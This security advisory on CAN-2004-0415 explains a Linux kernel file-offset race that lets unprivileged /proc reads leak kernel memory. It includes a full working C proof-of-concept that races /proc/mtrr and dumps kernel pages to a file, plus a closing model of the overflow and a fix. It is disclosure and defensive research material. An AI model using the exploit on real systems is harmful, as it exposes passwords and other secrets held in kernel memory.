Synopsis:  Linux kernel file offset pointer handling
Product:   Linux kernel
Version:   2.4 up to and including 2.4.26, 2.6 up to and including 2.6.7
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
CVE:       CAN-2004-0415
Author:    Paul Starzetz
Date:      Aug 04, 2004


Issue:
======

A critical security vulnerability has been found in the Linux kernel code
handling 64bit file offset pointers.


Details:
========

The Linux kernel offers a file handling API to the userland applications.
Basically a file can be identified by a file name and opened through the
open(2) system call, which in turn returns a file descriptor for the kernel
file object.

One of the properties of the file object is the 'file offset' (the f_pos
member variable of the file object), which is advanced whenever one reads
from or writes to the file. It can also be changed through the lseek(2)
system call and identifies the current reading/writing position inside the
file image on the media.

There are two different versions of the file handling API inside recent
Linux kernels: the old 32 bit and the new (LFS) 64 bit API. We have
identified numerous places where invalid conversions from 64 bit sized file
offsets to 32 bit ones, as well as insecure access to the file offset
member variable, take place.

We have found that most of the /proc entries (like /proc/version) leak
about one page of uninitialized kernel memory and can be exploited to
obtain sensitive data.

We have found dozens of places with suspicious or bogus code.
One of them resides in the MTRR handling code for the i386 architecture:

static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                         loff_t *ppos)
{
[1] if (*ppos >= ascii_buf_bytes) return 0;
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
    if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3] *ppos += len;
    return len;
}   /*  End Function mtrr_read  */

It is quite easy to see that, since copy_to_user can sleep, the later
references to *ppos may see a different value than the one that was
checked. In other words, code operating on the file->f_pos variable through
a pointer must be atomic with respect to the current thread. We expect even
more trouble in the SMP case, though.


Exploitation:
=============

In the following we concentrate on the mtrr.c code; however, we think that
other f_pos handling code in the kernel may be exploitable as well.

The idea is to use the blocking property of copy_to_user to advance the
file->f_pos file offset to a negative value, allowing us to bypass the two
checks marked with [1] and [2] in the above code.

There are two situations where copy_to_user() will sleep if there is no
page table entry for the corresponding location in the user buffer used to
receive the data:

- the underlying buffer maps a file which is not in the kernel page cache
  yet. The file content must be read from the disk first

- the mmap_sem semaphore of the process's VM is in a closed state, that is
  another thread sharing the same VM caused a down_write on the semaphore.

We use the second method as follows. One of two threads sharing the same VM
issues a madvise(2) call on a VMA that maps some sufficiently big file,
setting the madvise flag to WILLNEED. This will issue a down_write on the
mmap semaphore and schedule a read-ahead request for the mmaped file.

The second thread issues in the meantime a read on the /proc/mtrr file,
thus going to sleep until the first thread returns from the madvise system
call.
The two threads will be woken up in a FIFO manner, so the first thread runs
first and can advance the file pointer of the proc file to the maximum
possible value of 0x7fffffffffffffff while the second thread is still
waiting in the scheduler queue for the CPU (in the non-SMP case).

After the place marked with [3] has been executed, the file position will
have a negative value and the checks [1] and [2] can be passed for any
buffer length supplied, thus leaking the kernel memory from the address of
ascii_buffer on to the user space.

We have attached a proof-of-concept exploit code to read portions of kernel
memory. Another exploit code we have at our disposal can use other /proc
entries (like /proc/version) to read one page of kernel memory.


Impact:
=======

Since no special privileges are required to open the /proc/mtrr file for
reading, any process may exploit the bug to read huge parts of kernel
memory.

The kernel memory dump may include very sensitive information like hashed
passwords from /etc/shadow or even the root password.

We have found in an experiment that after the root user logged in using ssh
(in our case it was OpenSSH using PAM), the root password was kept in
kernel memory. This is very surprising since sshd will quickly clean
(overwrite with zeros) the memory portion used to store the password. But
the password may have made its way through various kernel paths like pipes
or sockets.

Tested and known to be vulnerable kernel versions are all <= 2.4.26 and
<= 2.6.7. All users are encouraged to patch all vulnerable systems as soon
as appropriate vendor patches are released. There is no hotfix for this
vulnerability.


Credits:
========

Paul Starzetz has identified the vulnerability and performed further
research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION PRESENTED
HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS.


Disclaimer:
===========

This document and all the information it contains are provided "as is", for
educational purposes only, without warranty of any kind, whether express or
implied.

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information provided, including any kind of information which is incomplete
or incorrect, will therefore be rejected.


Appendix:
=========

/*
 * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <errno.h>
#include <signal.h>

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/mman.h>

#include <linux/unistd.h>

#include <asm/page.h>


// define machine mem size in MB
#define MEMSIZE 64


_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
          uint, wh);


void fatal(const char *msg)
{
    printf("\n");
    if(!errno) {
        fprintf(stderr, "FATAL ERROR: %s\n", msg);
    }
    else {
        perror(msg);
    }

    printf("\n");
    fflush(stdout);
    fflush(stderr);
    exit(31337);
}


static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
           size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;


// child close semaphore & sleep
int start_child(void *arg)
{
// unlock parent & close semaphore
    go[0]=0;
    madvise(file, csize, MADV_DONTNEED);
    madvise(file, csize, MADV_SEQUENTIAL);
    gettimeofday(&tv1, NULL);
    read(pfd, buf, 0);

    go[0]=1;
    r = madvise(file, csize, MADV_WILLNEED);
    if(r)
        fatal("madvise");

// parent blocked on mmap_sem? GOOD!
    if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
        r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
        if( r == -1 )
            fatal("lseek");
        printf("\n[+] Race won!"); fflush(stdout);
        go[0]=2;
    } else {
        printf("\n[-] Race lost %d, use another file!\n", go[1]);
        fflush(stdout);
        kill(getppid(), SIGTERM);
    }
    _exit(1);

return 0;
}


void usage(char *name)
{
    printf("\nUSAGE: %s ", name);
    printf("\n\n");
    exit(1);
}


int main(int ac, char **av)
{
    if(ac<2)
        usage(av[0]);

// mmap big file not in cache
    r=stat(av[1], &st);
    if(r)
        fatal("stat file");
    csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

    fd=open(av[1], O_RDONLY);
    if(fd<0)
        fatal("open file");
    file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
    if(file==MAP_FAILED)
        fatal("mmap");
    close(fd);
    printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);
    fflush(stdout);

    pfd=open("/proc/mtrr", O_RDONLY);
    if(pfd<0)
        fatal("open");

    fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
    if(fd<0)
        fatal("open data");

    r=ftruncate(fd, fsize);
    if(r<0)
        fatal("ftruncate");
    buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if(buf==MAP_FAILED)
        fatal("mmap");
    close(fd);
    printf("\n[+] mmaped kernel data file at %p", buf);
    fflush(stdout);

// clone thread wait for child sleep
    nc = nice(0);
    cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
               CLONE_FILES|CLONE_VM, NULL);
    nice(19-nc);
    while(go[0]==0) {
        i++;
    }

// try to read & sleep & move fpos to be negative
    gettimeofday(&tv1, NULL);
    go[1] = 1;
    r = read(pfd, buf, size );
    go[1] = 2;
    gettimeofday(&tv2, NULL);
    if(r<0)
        fatal("read");
    while(go[0]!=2) {
        i++;
    }

    us = tv2.tv_sec - tv1.tv_sec;
    us *= 1000000;
    us += (tv2.tv_usec - tv1.tv_usec) ;

    printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);
    r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
    if(r < 0 ) {
        printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");
        fflush(stdout);
        i=0;
        for(;;) {
            r = read(pfd, buf, PAGE_SIZE );
            if(r!=PAGE_SIZE)
                break;
            buf += PAGE_SIZE;
            i++;
            printf("\r    PAGE %6d", i); fflush(stdout);
        }
        printf("\n[+] done, err=%s", strerror(errno) );
        fflush(stdout);
    }
    close(pfd);

    printf("\n");
    sleep(1);
    kill(cpid, 9);

return 0;
}
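

For comparison with mtrr_read in the Details section, the following
user-space sketch models the arithmetic that lets checks [1] and [2] pass
once the offset has wrapped, and one possible way to close the hole by
working on a private snapshot of the offset. It is an illustration under
stated assumptions, not the vendor patch: demo_buf, wrap_add,
checks_pass_unclamped and snapshot_read are hypothetical names, memcpy
stands in for copy_to_user, -1 stands in for a kernel error code, and the
conversion of an out-of-range unsigned value to int64_t is assumed to wrap
(as it does with gcc and clang).

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>   /* ssize_t */

/* Hypothetical stand-in for the kernel's ascii_buffer (not real MTRR data). */
static const char demo_buf[] = "reg00: base=0x00000000 size=64MB\n";
#define DEMO_BYTES ((int64_t)(sizeof(demo_buf) - 1))

/*
 * Model of "*ppos += len" at [3]: the sum is computed in unsigned
 * arithmetic so this C code has no signed overflow, then converted back.
 * Assumption: the conversion wraps (implementation-defined, true for
 * gcc and clang).
 */
static int64_t wrap_add(int64_t pos, uint64_t len)
{
    return (int64_t)((uint64_t)pos + len);
}

/*
 * Returns 1 if a read of len bytes at offset pos would get past checks
 * [1] and [2] of mtrr_read with len left unclamped, 0 otherwise.
 */
static int checks_pass_unclamped(int64_t pos, size_t len)
{
    if (pos >= DEMO_BYTES)                  /* check [1] */
        return 0;
    if (wrap_add(pos, len) > DEMO_BYTES)    /* check [2]: len is clamped */
        return 0;
    return 1;
}

/*
 * Sketch of a safer read: the shared offset is read once into a local
 * variable, negative offsets are rejected, and every later step uses the
 * local copy only.
 */
static ssize_t snapshot_read(char *dst, size_t len, int64_t *ppos)
{
    int64_t pos;

    assert(dst != NULL && ppos != NULL);
    pos = *ppos;                    /* single read of the shared offset */

    if (pos < 0)
        return -1;                  /* stand-in for an error such as -EINVAL */
    if (pos >= DEMO_BYTES)
        return 0;                   /* end of buffer */
    if (len > (uint64_t)(DEMO_BYTES - pos))
        len = (size_t)(DEMO_BYTES - pos);

    memcpy(dst, demo_buf + pos, len);   /* copy_to_user() in the kernel */
    *ppos = pos + (int64_t)len;         /* cannot overflow: pos + len <= DEMO_BYTES */
    return (ssize_t)len;
}
```

Calling wrap_add(INT64_MAX, 4096) yields a negative offset, for which
checks_pass_unclamped reports that a full-length read would go through,
whereas snapshot_read refuses the same offset. In the kernel the snapshot
alone does not serialize concurrent readers; it only guarantees that the
value that was checked is the value that is used.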